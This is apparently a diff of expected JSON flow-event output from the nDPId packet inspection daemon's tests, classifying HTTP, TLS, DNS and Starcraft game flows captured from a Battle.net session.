-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 